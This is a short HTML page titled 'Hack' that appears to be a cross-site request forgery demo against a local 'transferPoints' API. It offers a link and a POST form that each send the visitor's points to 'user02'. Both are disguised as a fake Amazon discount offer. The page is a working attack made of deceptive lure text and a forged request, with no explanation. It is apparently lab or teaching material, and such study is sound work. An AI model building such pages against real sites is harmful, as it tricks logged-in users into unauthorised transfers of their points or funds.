<html>
<head>
</head>
<body>
  <div>
    <h4>Hack</h4>
    <div>
      Get method: 
      <a href="http://localhost:8888/api/transferPoints?dstUser=user02" >Click and you can get some discount in Amazon!</a>
    </div>
    <br /> <br />
    <form method="POST" action="http://localhost:8888/api/transferPoints">
      Post method:
      <input type="text" name="dstUser" id="dstUser" value="user02"/>&nbsp;
      <button type="submit">Click and you can get some discount in Amazon!</button>
    </form>
  </div>
</body>
</html>